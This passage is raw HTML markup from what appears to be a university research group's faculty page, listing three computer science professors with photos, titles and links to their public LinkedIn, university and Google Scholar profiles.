38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 